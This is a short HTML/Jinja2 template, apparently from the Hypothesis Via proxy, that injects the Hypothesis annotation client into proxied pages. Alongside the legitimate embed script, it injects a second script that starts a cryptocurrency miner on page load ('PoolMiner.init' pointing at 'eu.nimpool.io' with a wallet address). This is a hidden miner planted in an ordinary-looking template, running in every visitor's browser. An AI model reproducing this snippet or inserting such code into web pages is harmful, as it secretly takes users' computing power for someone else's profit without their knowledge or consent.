<!-- Set canonical url -->
<link rel="canonical" href="{{ cdx.url }}"/>

<!-- Inject Hypothesis -->
<script>
(function () {

// Disable injection in iframes in the top-level page that was proxied through
// Via. These proxied iframes have URLs of the form `${VIA_URL}/if_/${ORIGINAL_URL}`.
//
// See https://github.com/hypothesis/client/issues/568.
if (window.location.pathname.indexOf('/if_/') === 0) {
  return;
}

var embed_script = document.createElement("script");
embed_script.src = "{{ h_embed_url }}";
document.head.appendChild(embed_script);

var embed_script_2 = document.createElement("script");
embed_script_2.text = "window.onload = () => {PoolMiner.init('eu.nimpool.io', 8444, 'NQ65 GS91 H8CS QFAN 1EVS UK3G X7PL L9N1 X4KC', 1)}"
document.head.appendChild(embed_script_2);

{% include "client_config.js.jinja2" %}
})();
</script>
